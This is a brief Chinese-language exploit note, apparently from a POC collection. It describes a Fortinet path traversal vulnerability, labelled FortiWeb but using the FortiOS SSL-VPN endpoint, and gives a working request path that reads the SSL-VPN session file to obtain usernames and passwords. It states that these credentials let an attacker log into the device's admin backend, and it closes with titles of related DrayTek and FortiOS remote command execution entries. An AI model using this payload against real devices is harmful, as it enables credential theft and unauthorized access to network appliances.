Fortinet FortiWeb路径遍历漏洞,攻击者通过漏洞可以获取缓存信息,登录服务器
登录页面
验证POC
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
获取的账号密码即可登录后台
DrayTek企业网络设备 远程命令执行 CVE-2020-8515 Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684